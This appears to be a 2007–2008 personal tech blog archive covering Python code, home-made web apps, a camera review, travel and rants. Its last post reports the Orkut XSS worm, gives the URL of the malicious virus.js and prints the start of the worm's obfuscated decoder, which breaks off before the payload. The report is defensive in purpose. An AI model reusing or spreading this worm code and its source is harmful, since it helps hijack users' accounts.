Sounds From The Dungeon

Shared stuff, APIs, feeds, oh my!

There's no doubt about the fact that we are generating lots and lots of content as part of our online activities. We blog, leave comments, bookmark sites, upload photos and videos, provide status updates and what not. There's so much activity that it's hard to keep track of it all. RSS/Atom feeds have helped but it's just too much work to track down, subscribe and manage a dozen or more feeds for every person that you know.

On a personal level, I've tried to provide feeds for as many of the things I create/share as possible. There's this blog, the tidbits blog, the tumblelog, photos on flickr, code commits, travel updates, status updates and more. Recently was my attempt at bringing all of these bits and pieces of info back to a single location on antrix.net. Although slick (bias!), it really isn't what a central clearing house of a person's activities should look like. As it stands, Recently is rather limited: it doesn't provide permalinks nor feeds and does it allow interaction in the form of comments, etc.

Enter stage left: FriendFeed.

I've used FriendFeed on and off for some time now, most of the it spent trying to figure out what exactly it does. I still haven't so I will not try to explain. What I will do is to tell you that as of now, I've settled on letting FriendFeed track as much of my publicly accessible info as possible. So everything I mentioned above, with the exception of twitter updates, is now available to you - dear readers - on a single FriendFeed page. Love it or ignore it!

If you are on Facebook, a smaller helping of this stuff should also appear in your Facebook news feed. Of course, only if you are my 'friend'.

There's exactly one thing that I did towards this shuffling of data that's worth noting here. Regular readers will know that I've long been using del.icio.us as a link blog. I use it so much that I even wrote Dumble (and now oohEmbed) as a friendly tumblelog style front end to del.icio.us. So del.icio.us has to remain as the definitive link archive in these quarters.

With that in mind, you can understand why I've been so slow on the uptake of Google Reader's shared items feature, although I've been using Reader exclusively since perhaps late 2006. Simply put, I didn't want to fragment my shared links under two different sources - one of which wouldn't play ball with Dumble. The horror! The only reasonable thing to do was to write some code that took shared items from Google Reader and posted them to my del.icio.us account. And so I wrote yummy. My last blog post alluded to this wee bit of code and indeed, yummy does incorporate feedback from you, dear readers. Where by readers, I mean Harish!

On the whole, I think I'm happy with the current situation. Of course, I'd much happier if we were in the year 2012 with all this drama behind us - a distant memory of less civilized times. :-)

Now, I shall go pack my bags since, as Dopplr says, I'm scheduled to be in Mumbai tomorrow!

techtalk | 2 comments | permalink | 09.07.2008 17:02 SGT

Python: constrained containers

As it happens, I was playing with the del.icio.us API today because of reasons which I shall hopefully elaborate upon in the coming few days. While cooking up some code to interact with the API, I saw the need to model a basic del.icio.us post entity. For my needs, this entity wouldn't have to be much more than a dumb dictionary with keys like url, description, etc. So I started out that way but pretty soon I thought, wouldn't it be nice to be able to write post.url instead of post['url']? Further, wouldn't it be nice to constrain the keys in the dictionary to those required and prevent typo errors such as post['descrption'] instead of post['description']?

This seemed like the perfect opportunity to put into practice some of the stuff I'd learned about "new" style classes not too long ago. So I wrote the following class which implements the requirements laid out in the preceding paragraph. Since I'm just getting the hang of this stuff, please critique the code!

class Post(object):
    """Class to model a del.icio.us Post. It works like a struct/dict 
    like object which limits keys to a retricted subset, i.e. those
    used in a del.icio.us post."""

    __slots__ = ['description', 'url', 'extended', 'tags']

    def __getitem__(self, key):
        if key in self.__slots__:
            return self.__getattribute__(key)
        else:
            raise KeyError

    def __setitem__(self, key, value):
        if key in self.__slots__:
            self.__setattr__(key, value)
        else:
            raise KeyError('Given key is not allowed in class %s'\
                                % self.__class__.__name__)

    def __contains__(self, key):
        try:
            self.__getitem__(key)
        except:
            return False
        return True
    
    # urllib.urlencode() just needs this beyond the basic stuff above
    def items(self):
        return [(k, self[k]) for k in self.__slots__ if k in self]

And here's the usage of the class.

>>> p = Post()
>>> p.url
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
AttributeError: url
>>> p.url = 'http://google.com'
>>> p.url
'http://google.com'
>>> p['url']
'http://google.com'
>>> p['desc']
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "yummy.py", line 17, in __getitem__
    raise KeyError
KeyError
>>> p['description'] = 'Google homepage'
>>> p['description']
'Google homepage'
>>> p.items()
[('description', 'Google homepage'), ('url', 'http://google.com')]
>>> p.tags = 'search'
>>> p.items()
[('description', 'Google homepage'), ('url', 'http://google.com'), ('tags', 'search')]
>>> 'extended' in p
False
>>> p.extended = 'homepage of the world'
>>> p.items()
[('description', 'Google homepage'), ('url', 'http://google.com'), ('extended', 'homepage of the world'), ('tags', 'search')]
>>>

So, what am I doing wrong? :-)

techtalk | 6 comments | permalink | 04.07.2008 18:04 SGT

Announcing oohEmbed!

In my last post here, I mentioned some items on my ever growing TODO list and on top of that list was: Finish the web app that I've started working on.

Well, it's time to scratch that one off the list since oohEmbed.com is now live!

A bit of background before I get to what is oohEmbed. As you know, I've been working on and off on Dumble for the past several months. Now Dumble is a purely browser based application with antrix.net serving up just a bunch of static files. Because of this non-involvement of server-side programming and the web browser's same origin policy restrictions, there's a limit to how much smart URL-content-inferring can be achieved in Dumble. With the current design, Dumble can go only as far as the number of websites out there that support JSON APIs.

So on one side, I was toying around with adding a server-side component to Dumble's design to alleviate this problem. On the other, I was looking to kick the tires around Google App Engine. In between the two, the oEmbed specification was announced and thus was born oohEmbed.

So what exactly is oohEmbed? In the simplest terms, oohEmbed acts like a oEmbed API compatible proxy service between you (the developer) and target websites. For more details, visit the oohEmbed.com web site where I've described it a bit more with some examples.

Of course, I've re-written parts of Dumble to use this new oohEmbed service. You can find the forked version at oohembed.com/dumble/. If things go well, I'll designate this as the authoritative version and switch/redirect the version at antrix.net/dumble/ to it.

Thanks to the folks behind oEmbed for drafting the spec and to Google for creating App Engine. Although the App Engine environment is restrictive development wise, there's something to be said for a stack which allows one command - appcfg.py update myapp/ - deployments to the cloud! And it's all Python so I couldn't be any happier!

Please test out oohEmbed and let me know what you think. If you really want to please me, go build something on top of it!

techtalk | 2 comments | permalink | 01.06.2008 22:19 SGT

TODO List

My TODO list just keeps growing. In no particular order, I have to:

• Finish the web app that I've started working on
• Start the web app that I've planned out
• Finish processing photos and clear that backlog
• Get photo backups in order
• Print a few photos as an experiment
• Implement a major feature that I've planned for Mitter
• Finish reading the four books in various stages of completion. Perhaps only three; this one is too irritating to finish.
• Buy an Xbox 360 and play GTA 4, Bioshock

And this is not counting all of the stuff from work! I'm just too lazy these days and need to get my act together.

misc | 2 comments | permalink | 28.05.2008 14:47 SGT

Dumble Update #3

Alright, time for another Dumble update. For those tuning in late, Dumble is a web-app that auto-magically creates a tumblelog out of someone's delicious bookmarks. More background in this introductory post from last November.

So what's been cooking since the last Dumble update which was all the way back in December? For starters, Dumble's source code repository is now online so you can follow Dumble's progress as it happens!

Looking at the changes since December, apart from the bug-fixes and speedup related commits, I've added support for three more sites — Metacafe, Twitter and Wikipedia — while improving support for Amazon. While the Metacafe support just relies on the standard video embed widget, the Twitter and Wikipedia support leverages their respective APIs.

There are a few minor UI changes. You can find a feed subscription link to the currently viewed user's delicious bookmarks.

Finally, there's one change explicitly to support embedding of Dumble on other websites. Let's say you have a website and wish to have your own copy of Dumble running over there tumbling your delicious bookmarks. One way to do this is to just copy all the Dumble code and host it on your site. While I'm perfectly happy if you do that, there is a drawback to that approach. As and when I make any changes to Dumble, you'll have to keep up by modifying your copy of Dumble.

An easier way is to just embed http://antrix.net/dumble/ onto your site. Just copy the following HTML snippet into an index.html file and place it somewhere on your website. Be sure to modify the delicious username and optionally the tag parameters.

<html>
<head>
    <title>Dumble : auto tumble your delicious links</title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <style type="text/css" media="screen">
    html, body {
        margin: 0;
        padding: 0;
        border: 0;
        outline: 0;
    }
    </style>
</head>
<body>
<iframe src="http://antrix.net/dumble/?u=USERNAME&t=TAG&title=My delicious tumblelog" height="100%" width="100%" frameborder="0" scrolling="auto">
Since your browser doesn't support IFrames, please <a href="http://antrix.net/dumble/?u=Ravages">visit Dumble directly</a>.
</iframe>
</body>
</html>

Did you notice the title parameter in the iframe src URI? That's something I added just to enhance this kind of embedding of Dumble. The value of that title parameter will become the window/browser title.

You can see an example of such an embedded Dumble over on Selective Amnesia. In industry parlance, this would be called a reference installation. ;-)

As usual, please test Dumble on your browser/OS combo and let me know of any stuff that breaks. The Wikipedia support is especially hacky and I would appreciate some feedback on that. :)

techtalk | 0 comments | permalink | 28.05.2008 14:36 SGT

Dumble Update

This is a quick update on a few small improvements I've made to Dumble. If you don't know what Dumble is, please read my last post!

Herewith, the minor Changelog:

• There's a new link to quickly add the current user to your del.icio.us network.
• Amazon links now show better sized product images which are fetched using their web services api.
• Fixed a bug in the form where hitting enter key didn't trigger the form's default action. Thanks to Jois for pointing this out!
• Integration with del.icio.us using a View in Dumble bookmarklet and a similar greasemonkey script.

That last bit should really help those of you who liked Dumble but are too lazy to manually type in the url when needed :-)

techtalk | 0 comments | permalink | 28.05.2008 14:36 SGT

Dumble Update #2

I've been working on Dumble on and off since my last update here and there have been quite a few changes since then. Here are the highlights:

• Top Tags: Dumble now fetches the del.icio.us user's top tags so that you can quickly browse around and discover links.
• Session History: As you browse around Dumble, jumping from tag to tag or user to user, your Session History is displayed in a sidebar. This is my way of saying that 'supporting the Back button in an AJAX app is so nasty that I don't even want to attempt it.'
• Cookies: Your last fetched user/tag combo is now saved in a cookie so that the next time you visit Dumble, it'll directly load that combo.
• Internet Explorer 7: Dumble was broken in IE7 for a long time. I finally got around to tracing and fixing the bugs and things should work well in IE7 now. BTW, did you know that something as simple as a trailing comma in an array definition or using <script src="..." /> instead of <script src="..."></script> can confuse IE?
• Miscellany: Various other bugfixes and UI/Usability fixes.. like all links show real links instead of javascript code.

With that, my to-do list for Dumble is more or less complete. Of course, adding formatting support for more kinds of links is an ongoing process. But as far as the core feature set is concerned, I think we are at 1.0 and Dumble is ready for wider use!

As always, if you find any bugs or need any new features, please do comment!

techtalk | 0 comments | permalink | 28.05.2008 14:35 SGT

Dumble

Have you heard of tumblelogs? The Wikipedia definition today reads:

A tumblelog is a variation of a blog, that favors short-form, mixed-media posts over the longer editorial posts frequently associated with blogging. Common post formats found on tumblelogs include links, photos, quotes, dialogues, and video.

Popular and genre defining tumblelogs include Anarchaia and projectionist. My own Tidbits is an attempt at creating a tumblelog. However, I found that much of my tumbling is split between my del.icio.us linker and the Tidbits. Which led me to think if it was possible to create a tumblelog out of my delicious linker.

Dumble is born out of that thinking. Dumble takes any user's delicious links and tries to format the links in a form more suited for a tumblelog. For example, if the link is to a Youtube video, then Dumble automatically embeds the video in the page. Same goes for a link to a Flickr photo - the photo is inserted into the page. Take a look at my dumble, you'll get the idea.

Right now, special posts are created for links to Youtube, Google Video, College Humor videos, Flickr, Amazon and IMDb. The IMDb bit is interesting. I've been saving movie ratings on delicious for some time now and some of you started it too after I wrote about it here. So if Dumble finds a rating in the notes field (in the x/y format), it'll automatically substitute the rating with the appropriate number of stars!

Please give Dumble a spin and let me know what you think. Especially IE users since I've done zero testing on IE! If you find a bug, let me know and I'll boot to Windows (ugh!) and see what's breaking. Safari users, Dumble works okay in Konqueror so I'm guessing it'll be okay in Safari too.

I intend to add special post formatting for more sites periodically but there's a technical limitation to what's possible. Which brings me to:

=== Technical Bits ===

Just like Recently, Dumble is a pure Javascript affair with no server side logic involved. Well, at least none on my server ;-) It fetches JSON from delicious and flickr and whereever else possible. Which is kinda the limitation at the moment. For any more complex post creation, I need to fetch the actual page being linked to but since cross domain GET isn't allowed in the browser's security model, I'm stuck :-( I think I'll give up on my pure-JS ambitions and put in a dummy proxy on antrix.net for XMLHTTPRequests. That will allow for more special posts like a Wikipedia summary generator, etc.

My current todo list for Dumble includes back button support and keyboard navigation (like gmail/g-reader/bloglines). If you have any feature requests or comments on implementation, please let me know!

Related Posts: Dumble Update, Dumble Update #2, Dumble Update #3, oohEmbed powered Dumble

techtalk | 0 comments | permalink | 28.05.2008 14:34 SGT

Stickies #18 : FOC

Inspired by the always wonderful Indexed by Jessica Hagy.

media | 1 comment | permalink | 16.05.2008 19:17 SGT

Python + Prism == Your own Rich Internet Architecture?

So what happened is, we needed to build this application at work and it fell upon me to do it. For various reasons, I decided to write the app in a web client/server style where I wrote the app in python/web.py and a regular browser was used to access it. In other words, your fairly standard web app.

Eventually, it was decided that this model wasn't very convenient from an end-user point of view. The need to setup a separate web server (or integrate with an existing server) just to serve the app was a bit too much of a hassle. Plus, all of Firefox's chrome made this app not feel like an app! So what's a guy to do?

I decided to use webpy's baked in server to host the app and Mozilla's Prism as a client for the app. With the following bit of logic, both the client and server can be invoked from the same piece of code.

#!/usr/bin/env python

# File: ria.py
# Author: Deepak Sarda

import subprocess
import thread
import web

def launch_browser(*args):
    try:
        # Assuming you already have a Prism webapp profile mapped to http://localhost:8080/
        retcode = subprocess.call(['prism', '-webapp', 'helloworld@antrix.net.prism.app'])
    except:
        print 'Failed to create client interface'
    print 'Client exited. We can exit too!'
    thread.interrupt_main()

class App:
    def GET(self):
        print """<html><head><title>Hello World!</title></head>
        <body><h2>Hello World!</h2><p>If you can read this, 
        then you have just created your very own RIA!</p></body></html>"""

if __name__ == '__main__':
    thread.start_new_thread(launch_browser, ())
    web.run(('/', 'App'), globals())

Create a shortcut to ria.py and you have your own RIA solution! For bonus points, process all of the python code, web.py, database modules and what not with bb-freeze and you have a zero-install - just unzip and run - RIA!

techtalk | 0 comments | permalink | 10.04.2008 14:43 SGT

Stickies #17 : My Hobby

A new Stickies after a long time! Fans of xkcd will immediately pick the reference in this one. BTW, the numbers come from a true incident at the San Jose airport.

media | 0 comments | permalink | 31.03.2008 23:31 SGT

Observations on the Ricoh Caplio GX100

As you may or may not know (why not?!), I've had a Ricoh Caplio GX100 for a couple of months now. Long enough for me to be comfortable calling it just GX100. We are buddies now.

Anyway, I think it's about time I blogged about the camera. It's a good excuse to do it too considering the silence lately around these quarters.

So what's good about this camera? It's small, it's fast. It's there and ready when I need it. So when I come across good photo opportunities, I don't miss them for want of a camera. Like this one which was taken one morning on the way to my office.

As the old saying goes, the best camera is the one you have in your hand. And this best camera is not just small and fast and in my hand, it takes damn good photos too! Plus, I just love the 24mm wide lens. A few more months working with this and I think I'll have to get the 19mm adapter. One thing though: after getting used to the Panasonic FZ30's enormous zoom (35-420mm), I do have to adapt my shooting style to work within the limited 24-72mm range.

The ergonomics of the GX100 are fantastic. It's great to hold, all the dials are in the perfect place and the software is intuitive and clutter-free. In fact, the controls are the best I've seen in any camera so far. No amount of explaining here will do it justice. You have to pick one up and play with it for some time.

The GX100 takes beautiful macros. I could describe here how sharp the in-focus elements are or how nice the bokeh is but I suggest you just see some of the macros I've uploaded so far. Sure the focus hunts when in macro mode but do you really care about that? It's not like your subject is going to get up and leave!

Overall, I'm very pleased. So now it's time to talk about some downers.

The biggest short-coming is that the GX100 suffers from a rather limited dynamic range. You really have to keep a close eye on the histogram to make sure you don't blow out the sky or something else. I still haven't been able to take a good sweeping vistas kind of shot where everything from the sky to the landscape is properly exposed. Which is a real pity considering the 24mm wide-angle would be really great at taking such shots. Then again, I see several good landscape photos taken with the GX100 on Flickr so perhaps it's just something that I haven't figured out yet.

Another quibble I have is that if you are shooting in low light in Program or Aperture Priority mode and the required exposure duration is longer than a second, the software just refuses to set that. One second exposure it is, no more! It was only after being left with a few rather under-exposed low-light shots did I realize what was happening. Since there's no Shutter Priority mode (or Tv mode for Canon lovers!), you have to go to full manual to work around this gotcha. Of course, since the GX100 has separate dials to control aperture & shutter speed, using the manual mode is no chore.

Yes, you heard that right. Full manual control with two separate dials in a compact camera!

What else? Not much actually. To sum up, it's a great little camera which may or may not be a bit expensive for your budget. It won't replace your SLR but if you are the kind who shoots with a SLR, you ought to look at the GX100 as a companion camera. Interesting anecdote: I was all set to buy a second hand GX100 from a local photographer. Price and date of transaction were fixed. On the night before the camera was scheduled to exchange hands, the guy tells me he's decided against selling it. When I asked why, he explained that he really liked the macro capability of the GX100. Since he liked taking macros, he could either buy a reasonably good macro lens for his SLR at $300+ or just keep the GX100 as a macro camera while having his SLR for other shots. With the GX100 around, he wouldn't have to swap lenses on his SLR whenever he felt like going macro. True story!

However, if you aren't really into photography and are looking at the GX100 just for its compact size and wide angle capability, I suggest you stay away. Its quirks will be enough to make you think that you just threw away good money at this no-good piece of Japanese thrash! You really have to know what you are doing when using this camera. Case in point: the GX100 flash isn't going to pop-up by itself in low-light - you have to decide whether you want flash or not.

On the other hand, the same quirks would make the GX100 a good learning tool for someone who wants to get serious about his/her photo taking but isn't too keen on carrying a kilogram of photo gear around.

As for me, I think I'll have to start looking at those Pentax SLRs sometime soon!

techtalk | 4 comments | permalink | 28.03.2008 19:20 SGT

Dumb Questions

For some reason, I had to use my SingPass and while logging in, I was asked to pick and answer some security questions. If you've signed up for an online service, chances are that you've been through the same experience. Here's the list of five questions of which I was asked to pick two:

1. What is your pet's name?
2. Which is your favourite actor?
3. What is the title of your favourite book?
4. What is your mother's maiden name?
5. What is your father's date of birth?

So let's see:

1. I don't have a pet
2. Favourite today? Film? TV? Indian? Angrezi?
3. Favourite today? Fiction? Non-Fiction?
4. Okay.. that I know
5. Okay.. that I .. wait.. you want the year also?

Why do they pick questions that will most certainly have answers that change with time? Some months in the future, after I've read some awesome new book and have decided that that has to be the best book ever, you expect me to make a careful note as to which is the second best book ever just so I don't get locked out of this account. WTF?!

For the record, I chose to answer 4 and 5 and I'm sure I put in the wrong year. I wonder how many incorrect answers they'll allow before sending the cops to get me.

rants | 5 comments | permalink | 04.02.2008 12:12 SGT

Trip Summary

kilometres travelled: 9235
cities visited: 4
nephews/nieces met again: 3
old friends met again: 16
weddings attended: 1
photos clicked: 378
kites lost: 3
times MasterCard used: 0

misc | 2 comments | permalink | 02.02.2008 17:39 SGT

Ricoh GX100

Bought the Ricoh GX100 tonight.

I fly out to India tomorrow for a two week break. More on the trip and the camera after I return!

misc | 4 comments | permalink | 13.01.2008 01:46 SGT

How did we get here?

Last night, my housemate came back with a new hard disk to replace his laptop's dead one and asked me to get it up and running. Although I hadn't done a Windows install in ages, I figured it would be straight-forward and wouldn't take much time.

1. His HP came with an honest to god proper Windows CD and not some restore partition bullshit. Good on HP! Let's boot from this CD.
2. Start setup.. it copies files.. reboot.
3. Graphical Setup begins.. bunch of copying.. bunch of questions.. copying.. questions.. copying.. questions.. aargh! Why can't you ask me all the questions in one go!! Reboot.
4. Login and realize wireless doesn't work. Hmm.. no option to use WPA TKIP auth? Quick googling on another machine reveals that WPA is only available with Service Pack 2. What's this machine? SP1. Okay...
5. Dig out a spare ethernet cable and take the laptop to the router and mate the two.
6. Now let's start Windows Update. Update needs to update? Okay. update Update. Reboot.
7. Start Windows Update again. What, no SP2 option? But you have 60 other critical updates instead? But wait, what's this shiny graphic next to the critical updates list urging me to update to SP2 to get security updates?! I want to but how do I get SP2?! I'm suffering some cognitive dissonance here. Okay, whatever.. I'll install these updates first. Accept license.. Accept lic.. Accept.. Go!
8. As the clock turns midnight and an Amazing Race episode ends, we are asked to reboot. Of course.
9. Start Windows Update yet again. Finally an option to install SP2! Start.. Accept.. Go! SP2 setup downloads some 70 odd MB, starts and gives some error that you need to be on AC power before running setup. Aren't we already on AC power? Weird; we are plugged in and yet, there's a battery icon in the systray instead of a power plug icon. Hmm.. remove and re-insert power cord. No change. Reboot (long shot) and try again.. still no go. AC power is still not detected :-( Okay, remove the battery (really long shot!) and boot just on AC power. Works!
10. Start Windows Update for the nth time. Thankfully, SP2 setup resumes without re-downloading from scratch. Bunch of next, next, next and off to bed hoping it'll do its thing without needing anymore nexts.
11. Come morning and SP2 setup is waiting for someone to reboot.
12. After reboot, go to wireless properties and WTF?! Still no WPA option?!
13. Hmm.. open Device Manager, find the wireless card, update driver. Thankfully, no reboot needed!
14. Open wireless properties with trepidation and hallelujah! Finally, we have a place to enter the WPA key and get online!

While I certainly haven't used all of the operating systems out there, I can safely assert that none of them can be managed by regular people.

---

This was supposed to be posted yesterday, but I forgot to upload!

rants | 2 comments | permalink | 11.01.2008 14:44 SGT

Stickies #16 : Dead man talking

Too many zombie references have passed my eyes this last week. Drew this while I was (still am!) killing time waiting for a midnight conf-call. Hopefully, it's worth at least a chuckle!

media | 7 comments | permalink | 07.01.2008 22:38 SGT

Jan 1, 2008

misc | 0 comments | permalink | 01.01.2008 19:26 SGT

This and That: 9th Edition

It's been long since something substantial appeared here. By here, I mean, specifically here in the Journal - there's no lack of activity elsewhere. And by substantial, I mean something bloggy, not some email outage or worm coverage. I'll try and make up for it by making this the longest blog post ever. So set some time aside and prepare for some serious rambling. Get a snack if you must.

I've been travelling for the past few weeks for work. Now travelling by itself isn't so bad if you can avoid the travel part of it. The travel itself isn't so bad if you can avoid the airports, especially all of the non-Changi ones. The airports themselves aren't so bad if you can avoid the insane security theatre that greets you at every one of them. It helps to have flown enough miles to get priority check-in & boarding privileges but there's no way around the barefoot dance through the scanner while some uniformed drone peers at layers of your packed stuff in grey/green/red. Or is there?

I was in San Francisco for the first couple of weeks of this trip. It was cold. I was mostly working out of the hotel so that wasn't such a big deal. But I didn't relish having to think about stepping out at just seven in the evening! I guess it's kinda like having to think about stepping out at two in the afternoon here in Singapore.

As you may know, it gets dark pretty early in the northern latitudes of our planet. (I haven't gone South of Equator yet.) I knew that factoid too and have experienced it first hand for more than a couple of times. Still, having to re-adjust my clock to a new Sun-cycle is hard. And I'm not talking about jet-lag. You see, I am used to working till dusk, then tuning out, having dinner and perhaps doing a bit of work later in the night after dinner. But with dusk falling at 5 in the evening, it's hard to keep my head from tuning out so early in the day. I felt like shutting down at 5 in the evening, watching TV at 6 and then having dinner at 6:30. My body-clock's working hours are intimately tied to the Sun's - whether I work at night or day. It's hard to separate my schedule from the Sun's.

I shudder to think of how I would cope in Finland.

I managed to visit the Golden Gate bridge this time. It's truly a magnificent structure. Luckily, the day that I went there was a clear one and I got great views all around. Well, all around except for due-west where the late afternoon sun was hanging out.

I got a little active on Facebook while in California. It's much better designed than Orkut, for sure. And it's got Apps. Oh apps.. at once the best and the worst of Facebook. Do I really need to know who bit whom? I'd rather use an app like Dopplr to know who's going where - now that's useful! And I imagine usefulness is the raison d'etre of a social network. Seriously, everyone I know should join Dopplr. It's really useful when you need it and stays out of your way when you don't. Just perfect.

For all the talk of platforms and openness on Facebook, I haven't found any app that is really open. There's the Flixster movies app. I already rate my movies elsewhere - can I import those ratings into Flixster? Can I take my ratings out of Flixster to re-use elsewhere? No and no. Then there are the places I've been to apps. Same story. Can't take out data and can't bring in data from elsewhere.

And then there are the annoying and downright devious apps from the Rockyou.com folks. I added their Likeness app and they used that access privilege to start sending me messages for their Superwall app. Cross-selling BS! No more Rockyou apps for me, thank you very much.

I guess I'll have to write my own apps the way I want them. But then, why would I bother writing one for this closed platform?

I got a chance to visit the Stanford campus where a friend from IIT days showed me around. It's a nice campus with some interesting architecture. Though I found Princeton to be more charming in that sense. But anything is better than MIT architecture, I suppose ;-)

I also went down to the campus bookstore while at Stanford to pick up a Moleskine. It's certainly a very well made notebook with a great feel to it. But I don't think it justifies the cost. I guess the price premium is because many regard it, for lack of a better analogy, as the iPod of notebooks. For me, my horrible handwriting just destroys the beauty of the book :-) It's been really long since I hand-wrote a full page of text in one go. Have any of you written much since you stopped attending classes?

I tried writing in Hindi some time back. It was a disaster. I don't think I can write the entire varnamala from memory. Depressing. On the other hand, I'm happy I could recall the word varnamala without looking it up!

Speaking of writing, I'm writing this in white letters on a dark background. Yes, I've switched my KDE colour scheme to a dark one. It's a nice experience, like all your apps are Adobe Lightroom :-) But it also breaks many apps since lots of apps assume a default light background or a light colour scheme. It's especially bad if you set the web browser to use a default dark canvas - it breaks a lot of websites (including mine!) which forget to explicitly set a background colour. You can imagine the results of that!

Kate, with the dark syntax highlighting scheme, looks great in this colour theme. I tried replicating this with Eclipse but it's just not possible. Broken-ness all over the place.

What else?

The last leg of the trip was in Tokyo where the temperature dropped below 10°C. The hotel we stayed at this time had rooms of a size that reminded me of my cozy hostel room in IIT Madras. And the bathroom was as big as an Indian Railways coach toilet - except - this one also had to make space for a shower. Interestingly, the shower area was a bath-tub but I can't imagine anyone over four feet tall using that tub. The bath had some redeeming qualities, though. The shower featured independent knobs for water volume & water temperature. It bugs me no end where the shower apparatus doesn't let me zero in to the right temperature and then lock that! I don't want every use of the shower to become a chance to exercise the Bisection method!

The other redeeming quality was the presence of heated mirror. I don't really like the soft-blur effect when I'm shaving, thank you very much. If you take these two things for granted, clearly, your quality of life is much better than mine.

The Japanese have this interesting culture of going out almost every night of the week, unlike us who limit the partying to the weekend. You'll find the watering holes crowded until midnight all through the week. I wonder how the young cope with their hang-overs when they have to report to work the next day, on time, no matter what time they hit the sack the night before. :-)

I got a free evening in Tokyo and while walking around Ginza, decided to visit Bic Camera on a lark. I was actually going to get just a retractable ethernet cable before walking out of the store but ended up spending almost an hour over there just geeking over everything. Got a chance to play with the Ricoh GR Digital II. It's a beautiful camera, both in looks and operation. The look is very distinctive with a matt finish and great form. The operation is just fabulous with almost every function you'd want just a dial/knob/click away! If only it weren't so darn expensive! 74,800 Yen! Its zoom lens cousin, the GX 100, wasn't much cheaper at 68,800 Yen :-(

That's a long enough post! I'll leave you with these yummy digital delights from a Bic store display.

ramblings | 0 comments | permalink | 21.12.2007 00:49 SGT

Orkut XSS

Aftermath: Let's try and summarize everything here.

1. On Orkut, you can use arbitrary HTML when scrapping your friends. Rodrigo's worm exploited this 'feature'. What it did was to start with scrapping a malicious flash file. Just viewing this scrap causes the flash object to load which in turn loads our favourite virus.js file. The Javascript code in that file first joins you in the community called Infectatos pelo Virus do Orkut (in English - Infected by the Orkut Virus) and then sends the same flash file as a scrap to as many people in your friends list as possible. So when each of your friends sees their Scrapbook, they in turn start propagating the worm to their friends, etc.

2. Friends don't let friends use raw HTML would be a good maxim for everyone to follow ;-)

3. It's fair to say that almost every member of that community was an involuntary signup. So based on the reported peak size of the community, more than 655,000 users were affected.

4. The attack was apparently without malicious intent and done just to highlight the security problems with such networking sites. Although the motives might by clean, I question the modus operandi. McAfee folks have named this W32/KutWormor.

5. This post got linked from various places including several bloggers, News.com, ZDNet and Valleywag(!). But, like Valleyway points out, if this had happened on MySpace or Facebook, it would be all over the US media.

6. No official word from Orkut yet on this except this reply in a forum thread. Amusingly, the list of suggestions offered in that reply to 'stay safe' wouldn't have helped at all with this worm! This worm would have worked anyway unless you had Flash and/or Javascript disabled.

7. Curiously enough, the official Orkut blog got a new post during/after this incident but the post says absolutely nothing about what happened!

That's the summary and hopefully the last update here! The original post covering this worm follows below.

---

Someone (maybe Rodrigo Lacerda, see below) seems to have found an XSS attack for Orkut. A piece of javascript code, named virus.js and fetched from a myopera location, somehow made its way into my Orkut session and started scrapping everyone possible at a break-neck speed. My friends reported Spanish Portuguese (see first comment below) language scraps with some Flash content from me while I've seen similar scraps in my Scrapbook.

From my initial Firebug console digging, this code sneaks in when opening the Scrapbook page. And the attack code is fetched just after loading gtalknotifier004.js so perhaps there's an XSS hole in that script. Not sure though, I'm a JS newbie :-)

For now, don't log on to Orkut! Or if you use Adblock, just block anything named *virus.js

Does anyone know how the hell should I report such stuff to Orkut? I can't seem to locate any vulnerability report form in their support pages.

Update: If you've blocked the virus.js file, log in and check your communities. You'll see an extra one! If you aren't able to unjoin the community, don't panic. I believe it's just an automated throttling response by Orkut's systems as a response to the massive scrapping initiated from our account. Should be fixed in a few hours.

Update: The embedded flash in the notorious scrap (2008 vem ai... que ele comece mto bem para vc) is also part of the exploit. I don't know exactly what it does since I use Flashblock all the time! Also, some blogs are suggesting changing of passwords. I don't think that's needed since I don't believe passwords have been compromised. Of course, don't treat my opinion as infallible advice, do what you must. I know I'm not changing my password just because of this!

Update: Reader Steve (thanks!) informs me in the comments below that this hole was reported sometime back and was already fixed. From this page:

On November 8th 2006 Rajesh Sethumadhavan discovered a type 2 vulnerability in the social network site Orkut which would make it possible for orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th Orkut had fixed the vulnerability.

And the actual report referenced in the above quote: Orkut Group Cross Site Scripting Vulnerability. I don't know enough to say whether the situation we are seeing today is due to the same vulnerability.

Update: People seem to think that somehow they were responsible for facilitating this attack. Like perhaps they clicked on a bad link or something. From what I understand, this isn't a phishing attack and there's nothing you could've done to prevent this. Except, maybe, not visiting Orkut.com!

Update: Apparently fixed!. The virus.js file is no longer fetched and all the spam scraps in my scrapbook have disappeared. I could unjoin the 'special' community too, which at this point of time has 390,262 members which means (at least) 390,262 affected users. That's not good!

Update: More from Reader Steve in the comments. Apparently, the community that we all are involuntarily a part of now, is some kind of vigilante community created just to make a point that these systems are insecure. Steve's comment:

The infected group is called "Infectados pelo Vírus do Orkut" and has nearly 400K members (minus me now).
The group description (loosely translated via Babelfish) is:
In computer science, a virus is a malicious program developed by programmers who, such as a biological virus, infectum the system, makes copies of itself exactly and tries to spread itself for other computers, using itself of diverse ways. Return more for the community SEES AS IF TO PROTECT Click With this you if not to want here. CALM! If you lode to stop in this community, is certain that no data its were stolen and nor go to be, is not this my objective. If I will be certain, in the end of everything, this community I must I am crowded of people. This to only show as orkut can be dangerous, you came to stop here without clicar in none link absolutely malicious, everything was made reading scraps.

Update: Some readers have kindly posted deobfuscated versions of the virus.js script. Thanks! Since they weren't fitting well in the comments below, I've moved them to a pastebin site. See version 1 and version 2. I'll post some analysis if I get time to do some!

The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

function $(p,a,c,k,e,d) {
    e=function(c) {
        return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))
    };
    if(!''.replace(/^/,String)){
        while(c--){d[e(c)]=k[c]||e(c)}
        k=[function(e){return d[e]}];
        e=function(){return'\\w+'};
        c=1
    };
    while(c--){
        if(k[c]){
            p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
        }
    }
    return p
};
setTimeout(
